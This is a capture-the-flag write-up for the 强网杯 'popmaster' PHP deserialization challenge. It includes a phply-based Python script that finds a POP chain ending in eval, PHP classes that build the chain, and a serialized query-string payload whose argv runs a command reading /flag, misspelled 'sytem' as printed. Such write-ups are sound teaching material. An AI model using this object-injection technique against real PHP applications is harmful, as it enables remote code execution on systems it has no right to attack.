强网杯-popmaster

popmaster

exp如下(node为节点):

import nose
from phply import phplex
from phply.phpparse import make_parser
from phply.phpast import *
import pprint
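# Method that the walk starts from (the entry point of the chain to reconstruct).
func_name = "BFda7w"

# Path of the challenge source that is analysed; adjust to your own copy.
PHP_PATH = "C:\\Users\\86130\\Desktop\\popmaster.php"

# 强赋值函数直接跳过 -- calls into these methods are not followed because the
# callee reassigns the property before it is used, which breaks the chain.
# The author's note says this list has to be worked out by hand per challenge
# file; the walker raises instead of looping forever when it is incomplete.
skip_func = ["F03wGk", "c3BsKT", "C2S8YY", "g5uQo2", "mdNq2Z", "CpBMKR", "xYClcr", "RhTsLz", "rivyS9", "sIm1Q9", "qMKDLp", "dgkACH", "wWVqKa"]


def parse_php(path):
    """Return the phply AST (list of top-level nodes) of the PHP file at *path*.

    The file is opened with the platform default encoding, as the original
    script did; pass a path to a file saved in that encoding.
    """
    with open(path) as fh:
        source = fh.read()
    parser = make_parser()
    lexer = phplex.lexer.clone()
    lexer.filename = None
    return parser.parse(source, lexer=lexer)  # the abstract syntax tree


def index_methods(ast):
    """Map every method name to the ``Class`` node that declares it.

    The challenge file uses globally unique method names, so a flat
    name -> class map is enough.  A duplicated method name would silently
    keep the last class seen.  Top-level nodes that are not classes (for
    example inline HTML around the ``<?php`` block) are ignored.
    """
    functions = {}
    for top in ast:
        if not isinstance(top, Class):
            continue
        for member in top.nodes:
            if isinstance(member, Method):
                functions[member.name] = top
    return functions


def _next_hop(method, skip):
    """Return ``(callee_name, reached_eval)`` for the first followable call in *method*.

    Statements are visited in order.  A bare method-call statement, or a
    method call that phply exposes as the single-statement body of an
    ``if`` (``If.node``), names the next link unless the callee is in
    *skip*.  An ``eval`` statement ends the chain: ``(None, True)``.
    ``(None, False)`` means the method has neither.
    """
    for stmt in method.nodes:
        if isinstance(stmt, Eval):
            return None, True
        call = None
        if isinstance(stmt, MethodCall):
            call = stmt
        elif isinstance(stmt, If) and isinstance(stmt.node, MethodCall):
            call = stmt.node
        if call is None or call.name in skip:
            continue
        return call.name, False
    return None, False


def _method_node(owner, name):
    """Return the ``Method`` node called *name* declared on class node *owner*."""
    for member in owner.nodes:
        if isinstance(member, Method) and member.name == name:
            return member
    raise LookupError("class %r declares no method %r" % (owner.name, name))


def find_pop_chain(functions, start, skip):
    """Follow method calls from *start* until a method containing ``eval`` is reached.

    Returns the list of visited method names, *start* first.  Unlike a
    plain ``while`` over the AST, this raises ``RuntimeError`` instead of
    spinning forever when a method has no followable call and no ``eval``
    (usually a sign that *skip* is incomplete), or when the walk revisits
    a method.  ``KeyError`` is raised when a callee is not declared in any
    class of *functions*.
    """
    chain = [start]
    current = start
    while True:
        method = _method_node(functions[current], current)
        callee, done = _next_hop(method, skip)
        if done:
            return chain
        if callee is None:
            raise RuntimeError(
                "no followable call or eval in method %r; extend skip_func?" % current
            )
        if callee not in functions:
            raise KeyError(
                "method %r called from %r is not declared in any class" % (callee, current)
            )
        if callee in chain:
            raise RuntimeError("cycle detected at %r: %r" % (callee, chain))
        chain.append(callee)
        current = callee


def print_chain_classes(chain, functions):
    """Print PHP class stubs whose constructors nest the chain's classes in order.

    For each method name in *chain* the declaring class is printed with its
    public properties; every property's constructor line instantiates the
    class of the next link, and the last link gets an empty constructor.
    Output text is identical to the original script's.
    """
    for idx, name in enumerate(chain):
        cls = functions[name]
        is_last = idx + 1 == len(chain)
        print("class " + cls.name + "{")
        for member in cls.nodes:
            if not isinstance(member, ClassVariables):
                continue
            for var in member.nodes:
                print("public " + var.name + ';')
                print("public function __construct(){")
                if is_last:
                    print("")
                else:
                    # var.name carries the leading "$", which "$this->" already supplies.
                    print("$this->" + var.name[1:] + "= new " + functions[chain[idx + 1]].name + "();")
                print("}")
        print("}")


def main(path=PHP_PATH):
    """Parse *path*, walk the chain from ``func_name`` and print the class stubs."""
    functions = index_methods(parse_php(path))
    pop_chain = find_pop_chain(functions, func_name, skip_func)
    print(pop_chain)
    print_chain_classes(pop_chain, functions)


if __name__ == "__main__":
    main()

# Chains recorded by the author on earlier runs (kept for reference):
# pop_chain = ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz', 'xG4zKc',
# 'HgZWAg', 'HPwuDl', 'Vhw4qk', 'WLprHX', 'UZ6O8X', 'wCihxm', 'bUm181', 'Rcx3e8', 'pBcmHG', 'yv2r6Y', 'Nq02C8']
# ['BFda7w', 'kfsxbo', 'rivyS9', 'mdNq2Z', 'LHl965', 'E0eLx8', 'DuLIOe', 'WCe4Tq', 'TmAYUb', 'LAekG5', 'r2q0UF', 'C2S8YY', 'g5uQo2',
# 'KxPhgA', 'lsA527', 'LRu117', 'MFpxq9', 'xafXFm', 'GsVAVW', 'dGcfBB', 'YY6r37', 'gH4fYy', 'U6xl6Q', 'eRt60t']
# F03wGk c3BsKT C2S8YY g5uQo2 mdNq2Z CpBMKR xYClcr rivyS9 sIm1Q9
# qMKDLp dgkACH
# qqhftt qMKDLp M7qPV2 dgkACH xG4zKc
# ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz',
# 'dgkACH', 'S8CRbp', 'g0Evp1', 'FZp1N3', 'xkFzHK', 'gcVOmb', 'ozDZgT', 'gHWISY', 'c7rQmp', 'HwiCXY', 'OfIYHw', 'foTwm3']
# ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz', 'xG4zKc',
# 'HgZWAg', 'HPwuDl', 'Vhw4qk', 'WLprHX', 'UZ6O8X', 'wCihxm', 'bUm181', 'Rcx3e8', 'pBcmHG', 'wWVqKa', 'qM2mnx']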


得到pop链,构造payload打

<?php
/** Root of the object graph; its only property holds the next link. */
class TPmYmu
{
    public $qfDgtGD;

    public function __construct()
    {
        $this->qfDgtGD = new z3w6kL;
    }
}
/** Chain link: $X5XSpPz is populated with the next class on construction. */
class z3w6kL
{
    public $X5XSpPz;

    public function __construct()
    {
        $this->X5XSpPz = new olTmkb;
    }
}
/** Chain link: $tTEiXpd is populated with the next class on construction. */
class olTmkb
{
    public $tTEiXpd;

    public function __construct()
    {
        $this->tTEiXpd = new Moag8l;
    }
}
/** Chain link: $D8ea5Xn is populated with the next class on construction. */
class Moag8l
{
    public $D8ea5Xn;

    public function __construct()
    {
        $this->D8ea5Xn = new QcHqVE;
    }
}
/** Chain link: $XHhuV4y is populated with the next class on construction. */
class QcHqVE
{
    public $XHhuV4y;

    public function __construct()
    {
        $this->XHhuV4y = new hCG6ag;
    }
}
/** Chain link: $cYnq47g is populated with the next class on construction. */
class hCG6ag
{
    public $cYnq47g;

    public function __construct()
    {
        $this->cYnq47g = new EYyxSm;
    }
}
/** Chain link: $A7icng3 is populated with the next class on construction. */
class EYyxSm
{
    public $A7icng3;

    public function __construct()
    {
        $this->A7icng3 = new CDF5aP;
    }
}
/** Chain link: $KUxwPnq is populated with the next class on construction. */
class CDF5aP
{
    public $KUxwPnq;

    public function __construct()
    {
        $this->KUxwPnq = new a1rktQ;
    }
}
/** Chain link: $G2ZqPlg is populated with the next class on construction. */
class a1rktQ
{
    public $G2ZqPlg;

    public function __construct()
    {
        $this->G2ZqPlg = new bPC9aV;
    }
}
/** Chain link: $mUtXpNL is populated with the next class on construction. */
class bPC9aV
{
    public $mUtXpNL;

    public function __construct()
    {
        $this->mUtXpNL = new lNHRgw;
    }
}
/** Chain link: $iI0ggvd is populated with the next class on construction. */
class lNHRgw
{
    public $iI0ggvd;

    public function __construct()
    {
        $this->iI0ggvd = new uhsLTo;
    }
}
/** Chain link: $V4cm8RE is populated with the next class on construction. */
class uhsLTo
{
    public $V4cm8RE;

    public function __construct()
    {
        $this->V4cm8RE = new xmFnqe;
    }
}
/** Chain link: $XVKtQaL is populated with the next class on construction. */
class xmFnqe
{
    public $XVKtQaL;

    public function __construct()
    {
        $this->XVKtQaL = new ygWYP5;
    }
}
/** Chain link: $BeaCQ8a is populated with the next class on construction. */
class ygWYP5
{
    public $BeaCQ8a;

    public function __construct()
    {
        $this->BeaCQ8a = new kU9NTw;
    }
}
/** Chain link: $Rc3QaRn is populated with the next class on construction. */
class kU9NTw
{
    public $Rc3QaRn;

    public function __construct()
    {
        $this->Rc3QaRn = new gyRrwz;
    }
}
/** Chain link: $ykDFgZf is populated with the next class on construction. */
class gyRrwz
{
    public $ykDFgZf;

    public function __construct()
    {
        $this->ykDFgZf = new Q2GEHp;
    }
}
/** Chain link: $GgRUaWA is populated with the next class on construction. */
class Q2GEHp
{
    public $GgRUaWA;

    public function __construct()
    {
        $this->GgRUaWA = new cnxShX;
    }
}
/** Chain link: $lKlVzwp is populated with the next class on construction. */
class cnxShX
{
    public $lKlVzwp;

    public function __construct()
    {
        $this->lKlVzwp = new MyFOP4;
    }
}
/** Chain link: $aIr6pnl is populated with the next class on construction. */
class MyFOP4
{
    public $aIr6pnl;

    public function __construct()
    {
        $this->aIr6pnl = new TWKFWY;
    }
}
/** Chain link: $iMX9NnG is populated with the next class on construction. */
class TWKFWY
{
    public $iMX9NnG;

    public function __construct()
    {
        $this->iMX9NnG = new ogz6Dr;
    }
}
/** Chain link: $ThhObgx is populated with the next class on construction. */
class ogz6Dr
{
    public $ThhObgx;

    public function __construct()
    {
        $this->ThhObgx = new QaCgIg;
    }
}
/** Chain link: $gpW7aFB is populated with the next class on construction. */
class QaCgIg
{
    public $gpW7aFB;

    public function __construct()
    {
        $this->gpW7aFB = new Zg0xg5;
    }
}
/** Last link: $p4epegQ is deliberately left null, so it serializes as N;. */
class Zg0xg5
{
    public $p4epegQ;

    public function __construct()
    {
        // Nothing to nest beyond this point.
    }
}
// Build the whole graph from the root and print its serialized form.
$root = new TPmYmu;
echo serialize($root);
?>

payload为

?pop=O:6:"TPmYmu":1:{s:7:"qfDgtGD";O:6:"z3w6kL":1:{s:7:"X5XSpPz";O:6:"olTmkb":1:{s:7:"tTEiXpd";O:6:"Moag8l":1:{s:7:"D8ea5Xn";O:6:"QcHqVE":1:{s:7:"XHhuV4y";O:6:"hCG6ag":1:{s:7:"cYnq47g";O:6:"EYyxSm":1:{s:7:"A7icng3";O:6:"CDF5aP":1:{s:7:"KUxwPnq";O:6:"a1rktQ":1:{s:7:"G2ZqPlg";O:6:"bPC9aV":1:{s:7:"mUtXpNL";O:6:"lNHRgw":1:{s:7:"iI0ggvd";O:6:"uhsLTo":1:{s:7:"V4cm8RE";O:6:"xmFnqe":1:{s:7:"XVKtQaL";O:6:"ygWYP5":1:{s:7:"BeaCQ8a";O:6:"kU9NTw":1:{s:7:"Rc3QaRn";O:6:"gyRrwz":1:{s:7:"ykDFgZf";O:6:"Q2GEHp":1:{s:7:"GgRUaWA";O:6:"cnxShX":1:{s:7:"lKlVzwp";O:6:"MyFOP4":1:{s:7:"aIr6pnl";O:6:"TWKFWY":1:{s:7:"iMX9NnG";O:6:"ogz6Dr":1:{s:7:"ThhObgx";O:6:"QaCgIg":1:{s:7:"gpW7aFB";O:6:"Zg0xg5":1:{s:7:"p4epegQ";N;}}}}}}}}}}}}}}}}}}}}}}}&argv=sytem("cat /flag");//

